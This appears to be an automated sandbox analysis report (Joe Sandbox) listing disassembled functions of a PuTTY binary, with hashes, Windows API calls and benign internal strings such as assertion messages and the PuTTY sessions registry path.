                      • Instruction Fuzzy Hash: 2E11DF33B24A2691FBA08B26C9447A93B90BBA5B84F658035CE0D87790DF3DDC41CB08
                      Function 00007FF6785F9FD0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 59windowCOMMON
                      Download Yara Rule
                      APIs
                      Strings
                      • c && c->ctrl->type == CTRL_LISTBOX && !c->ctrl->listbox.multisel, xrefs: 00007FF6785FA027
                      • /home/simon/mem/.build/workdirs/bob-0_vdcidh/putty/windows/controls.c, xrefs: 00007FF6785FA02E
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2767618747.00007FF6785D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF6785D0000, based on PE: true
                      • Associated: 0000000C.00000002.2767592968.00007FF6785D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767723715.00007FF6786BA000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FB000.00000004.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FD000.00000004.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767833752.00007FF678701000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767833752.00007FF678709000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767888943.00007FF67870D000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_7ff6785d0000_putty.jbxd
                      Similarity
                      • API ID: ItemMessageSend
                      • String ID: /home/simon/mem/.build/workdirs/bob-0_vdcidh/putty/windows/controls.c$c && c->ctrl->type == CTRL_LISTBOX && !c->ctrl->listbox.multisel
                      • API String ID: 3015471070-795294906
                      • Opcode ID: 0b340bb8710d75010c8b75403d4adb33775eefad0a2dc6dcc00247611cc3728a
                      • Instruction ID: 476cf37351d5991f0fe73d4ec2b08dfa0baed3435c4c7a0efd550f23399f05cf
                      • Opcode Fuzzy Hash: 0b340bb8710d75010c8b75403d4adb33775eefad0a2dc6dcc00247611cc3728a
                      • Instruction Fuzzy Hash: 6711A223B25605D9FB618B26EC443B93BA0FB55B99F949035DE0C87794EE3CE885CB04
                      Function 00007FF6785F9F10 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 58windowCOMMON
                      Download Yara Rule
                      APIs
                      Strings
                      • c && c->ctrl->type == CTRL_LISTBOX && c->ctrl->listbox.multisel && c->ctrl->listbox.height != 0, xrefs: 00007FF6785F9F67
                      • /home/simon/mem/.build/workdirs/bob-0_vdcidh/putty/windows/controls.c, xrefs: 00007FF6785F9F6E
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2767618747.00007FF6785D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF6785D0000, based on PE: true
                      • Associated: 0000000C.00000002.2767592968.00007FF6785D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767723715.00007FF6786BA000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FB000.00000004.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FD000.00000004.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767833752.00007FF678701000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767833752.00007FF678709000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767888943.00007FF67870D000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_7ff6785d0000_putty.jbxd
                      Similarity
                      • API ID: ItemMessageSend
                      • String ID: /home/simon/mem/.build/workdirs/bob-0_vdcidh/putty/windows/controls.c$c && c->ctrl->type == CTRL_LISTBOX && c->ctrl->listbox.multisel && c->ctrl->listbox.height != 0
                      • API String ID: 3015471070-4034055451
                      • Opcode ID: 1324725a9ff61d9b3b6e02095e2f27996e4c3d528beff90453ecb7ce8199f2e5
                      • Instruction ID: a7551f32fc50e5e22fce0e30ff872b88f255afd9ea09ff27d29e6c574bf2f74d
                      • Opcode Fuzzy Hash: 1324725a9ff61d9b3b6e02095e2f27996e4c3d528beff90453ecb7ce8199f2e5
                      • Instruction Fuzzy Hash: 4111AF23B25B05D6FB618B26D8403B97BA0EB54B95F588035DE0C87794EE3CEC84DB04
                      Function 00007FF6785F9D30 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 57windowCOMMON
                      Download Yara Rule
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2767618747.00007FF6785D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF6785D0000, based on PE: true
                      • Associated: 0000000C.00000002.2767592968.00007FF6785D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767723715.00007FF6786BA000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FB000.00000004.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FD000.00000004.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767833752.00007FF678701000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767833752.00007FF678709000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767888943.00007FF67870D000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_7ff6785d0000_putty.jbxd
                      Similarity
                      • API ID: ItemMessageSend
                      • String ID: /home/simon/mem/.build/workdirs/bob-0_vdcidh/putty/windows/controls.c$c && c->ctrl->type == CTRL_LISTBOX
                      • API String ID: 3015471070-542244468
                      • Opcode ID: 638900d4bbbe74fd839ca0784a1d1c645808873d33638030f784285a59264cf8
                      • Instruction ID: fda95dd252dc8b364a7dedf198d9fded0ae75c59af2bbdafdd56c5f0189bb3b9
                      • Opcode Fuzzy Hash: 638900d4bbbe74fd839ca0784a1d1c645808873d33638030f784285a59264cf8
                      • Instruction Fuzzy Hash: 1611D333725A05CAEB508B26DC403B97B61EB98B99FA48035DE4C87795DE3CD885CB04
                      Function 00007FF6785F99B0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 56windowCOMMON
                      Download Yara Rule
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2767618747.00007FF6785D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF6785D0000, based on PE: true
                      • Associated: 0000000C.00000002.2767592968.00007FF6785D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767723715.00007FF6786BA000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FB000.00000004.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FD000.00000004.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767833752.00007FF678701000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767833752.00007FF678709000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767888943.00007FF67870D000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_7ff6785d0000_putty.jbxd
                      Similarity
                      • API ID: ItemMessageSend
                      • String ID: /home/simon/mem/.build/workdirs/bob-0_vdcidh/putty/windows/controls.c$c && c->ctrl->type == CTRL_EDITBOX
                      • API String ID: 3015471070-587671386
                      • Opcode ID: 367a966b6e37a6fdaa1772d553b07fe266872019545f1052af7bd23f7f29b435
                      • Instruction ID: c863c4bd18d09ceacf0b27c4de19adfc7c8a5c477af89b0e9cd5751013000e00
                      • Opcode Fuzzy Hash: 367a966b6e37a6fdaa1772d553b07fe266872019545f1052af7bd23f7f29b435
                      • Instruction Fuzzy Hash: 9C110633B24A1591FA118B26E9005666B51BBA4FD8FA08031CE0C87395DF3CD886D708
                      Function 00007FF67860506F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 55COMMON
                      Download Yara Rule
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2767618747.00007FF6785D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF6785D0000, based on PE: true
                      • Associated: 0000000C.00000002.2767592968.00007FF6785D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767723715.00007FF6786BA000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FB000.00000004.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FD000.00000004.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767833752.00007FF678701000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767833752.00007FF678709000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767888943.00007FF67870D000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_7ff6785d0000_putty.jbxd
                      Similarity
                      • API ID: BreakClearCloseCommHandle
                      • String ID: Error writing to serial device
                      • API String ID: 2685284230-3232346394
                      • Opcode ID: 7eb12c439e672dc5fa65efc19690cb1d9c5bd28e323bc0a838643cf16d101334
                      • Instruction ID: 0681517d07db7a34f1abd0560747497029a953fb3110214f69383ad98909785e
                      • Opcode Fuzzy Hash: 7eb12c439e672dc5fa65efc19690cb1d9c5bd28e323bc0a838643cf16d101334
                      • Instruction Fuzzy Hash: 5F218A2762564292EA249B36E09437E6760EF94BB0F244231CBAE877E5CF6CE845D344
                      Function 00007FF6785D71E0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 42windowCOMMON
                      Download Yara Rule
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2767618747.00007FF6785D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF6785D0000, based on PE: true
                      • Associated: 0000000C.00000002.2767592968.00007FF6785D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767723715.00007FF6786BA000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FB000.00000004.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FD000.00000004.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767833752.00007FF678701000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767833752.00007FF678709000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767888943.00007FF67870D000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_7ff6785d0000_putty.jbxd
                      Similarity
                      • API ID: CursorMessageShow
                      • String ID: %s Error
                      • API String ID: 2689832819-1420171443
                      • Opcode ID: 56ba602abdb3264e2971dc15fe112a15410bdf86c2fca282f0e8dd9a99c60566
                      • Instruction ID: 7aa954f3537f8b88dd36e56a1af8ed2ceb2824adb2214417a7946f9297beab83
                      • Opcode Fuzzy Hash: 56ba602abdb3264e2971dc15fe112a15410bdf86c2fca282f0e8dd9a99c60566
                      • Instruction Fuzzy Hash: FC11A322E3C686A0FA409731F88537B2F90AF94BD0F705031DD4D87766DE2CE8429B08
                      Function 00007FF6785DCF80 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 40windowCOMMON
                      Download Yara Rule
                      APIs
                      • MessageBoxA.USER32 ref: 00007FF6785DCFDC
                        • Part of subcall function 00007FF6785D6BD0: DeleteObject.GDI32 ref: 00007FF6785D6C21
                        • Part of subcall function 00007FF6785D6BD0: DestroyIcon.USER32(00000000,00000000,00000000,00007FF6785D6077,?,?,?,?,00007FF67864A920,?,?,?,?,00007FF678613528), ref: 00007FF6785D6C32
                        • Part of subcall function 00007FF6785D6BD0: DeleteObject.GDI32 ref: 00007FF6785D6C5B
                        • Part of subcall function 00007FF6785D6BD0: CoUninitialize.OLE32(00000000,00000000,00000000,00007FF6785D6077,?,?,?,?,00007FF67864A920,?,?,?,?,00007FF678613528), ref: 00007FF6785D6C70
                      Strings
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2767618747.00007FF6785D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF6785D0000, based on PE: true
                      • Associated: 0000000C.00000002.2767592968.00007FF6785D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767723715.00007FF6786BA000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FB000.00000004.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FD000.00000004.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767833752.00007FF678701000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767833752.00007FF678709000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767888943.00007FF67870D000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_7ff6785d0000_putty.jbxd
                      Similarity
                      • API ID: DeleteObject$DestroyIconMessageUninitialize
                      • String ID: %s Internal Error$Unsupported protocol number found
                      • API String ID: 1151367991-184558026
                      • Opcode ID: aaf80368ca53954cd90d1eb702873e0f1aa82ef3957093735d968e88b12884d8
                      • Instruction ID: ac32fc62d22eeba0b2154e2b515ccb06d2ec1f6c27f6432ac25036b9a2e7260f
                      • Opcode Fuzzy Hash: aaf80368ca53954cd90d1eb702873e0f1aa82ef3957093735d968e88b12884d8
                      • Instruction Fuzzy Hash: ECF04912E28507A1FA58A771A44A3FA5A919F44780F340835D90EC67D6EE2CED46A35C
                      Function 00007FF67860D020 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 38registryCOMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 00007FF678616460: RegCreateKeyExA.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,00000002,00000000,?,00007FF6786DEAB3,00000000), ref: 00007FF67861652D
                        • Part of subcall function 00007FF678616460: RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,00000002,00000000,?,00007FF6786DEAB3,00000000), ref: 00007FF678616576
                      • RegDeleteKeyA.ADVAPI32 ref: 00007FF67860D06B
                      • RegCloseKey.ADVAPI32 ref: 00007FF67860D07B
                      Strings
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2767618747.00007FF6785D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF6785D0000, based on PE: true
                      • Associated: 0000000C.00000002.2767592968.00007FF6785D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767723715.00007FF6786BA000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FB000.00000004.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FD000.00000004.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767833752.00007FF678701000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767833752.00007FF678709000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767888943.00007FF67870D000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_7ff6785d0000_putty.jbxd
                      Similarity
                      • API ID: Close$CreateDelete
                      • String ID: Software\SimonTatham\PuTTY\Sessions
                      • API String ID: 3931322244-490553574
                      • Opcode ID: 4b1984fb7c262d7d20289c66f2bcf03e70f15f26a06c3254bc2e2c9ddc0dde6e
                      • Instruction ID: 0f631c0769af7044e52e687dd3a4c29fdbe8036fd3945ba89d5ef74c8c0bc354
                      • Opcode Fuzzy Hash: 4b1984fb7c262d7d20289c66f2bcf03e70f15f26a06c3254bc2e2c9ddc0dde6e
                      • Instruction Fuzzy Hash: 27F09017F3D11220FD16A73666153FB4A411F89BE4E244230ED1E8B7C7EE2CD842A248
                      Function 00007FF678604F6B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 31timeCOMMON
                      Download Yara Rule
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2767618747.00007FF6785D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF6785D0000, based on PE: true
                      • Associated: 0000000C.00000002.2767592968.00007FF6785D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767723715.00007FF6786BA000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FB000.00000004.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FD000.00000004.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767833752.00007FF678701000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767833752.00007FF678709000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767888943.00007FF67870D000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_7ff6785d0000_putty.jbxd
                      Similarity
                      • API ID: CommErrorLast$StateTimeouts
                      • String ID: Configuring %s flow control
                      • API String ID: 274883806-3277764455
                      • Opcode ID: 719437e26983418da532ba82bb22c9a866490e0860abca4019a22f30a6799b5c
                      • Instruction ID: 3919fe197c6d0966ce383f44334226c2c21c2d0b99768f7b0babb6194a877dd4
                      • Opcode Fuzzy Hash: 719437e26983418da532ba82bb22c9a866490e0860abca4019a22f30a6799b5c
                      • Instruction Fuzzy Hash: 11F0A923E2C602A1F9219B31D44417B5B50AF85B84FB09531DD4DD6648DE7CEE81AB4C
                      Function 00007FF678604E30 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 29COMMON
                      Download Yara Rule
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2767618747.00007FF6785D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF6785D0000, based on PE: true
                      • Associated: 0000000C.00000002.2767592968.00007FF6785D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767723715.00007FF6786BA000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FB000.00000004.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FD000.00000004.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767833752.00007FF678701000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767833752.00007FF678709000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767888943.00007FF67870D000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_7ff6785d0000_putty.jbxd
                      Similarity
                      • API ID: Event_set_error_mode
                      • String ID: /home/simon/mem/.build/workdirs/bob-0_vdcidh/putty/windows/handle-io.c$h->type == HT_INPUT
                      • API String ID: 1844187620-945550184
                      • Opcode ID: 34eab87568b2f97d5e78bd25981b66ade2e13560c7c1c26ef2be028d2d195b8c
                      • Instruction ID: 0852688aa2facb521d6b1b09d2ca91042d99ed541c72e6b6b7229622defc83aa
                      • Opcode Fuzzy Hash: 34eab87568b2f97d5e78bd25981b66ade2e13560c7c1c26ef2be028d2d195b8c
                      • Instruction Fuzzy Hash: 32F0C813F2914161FF359735E81877E2F605F887A4F644171CA0E826E4AE6CEEC0E308
                      Function 00007FF678616250 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 24libraryloaderCOMMON
                      Download Yara Rule
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2767618747.00007FF6785D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF6785D0000, based on PE: true
                      • Associated: 0000000C.00000002.2767592968.00007FF6785D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767723715.00007FF6786BA000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FB000.00000004.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FD000.00000004.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767833752.00007FF678701000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767833752.00007FF678709000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767888943.00007FF67870D000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_7ff6785d0000_putty.jbxd
                      Similarity
                      • API ID: AddressProc
                      • String ID: SetDefaultDllDirectories$kernel32.dll
                      • API String ID: 190572456-2102062458
                      • Opcode ID: 3977d5c47726d2f85b452bdcaa505178c3a3fa69f2171c5116603cac5906ebac
                      • Instruction ID: 18d35d69c3a04ce7c8b15bdcb02a86a172406a2e8d88a98de27bd194d7237a50
                      • Opcode Fuzzy Hash: 3977d5c47726d2f85b452bdcaa505178c3a3fa69f2171c5116603cac5906ebac
                      • Instruction Fuzzy Hash: D3F0DA1AE2EB03A1FE998725AC563322E915F68300F740935C40DC57A5EE6CED55A718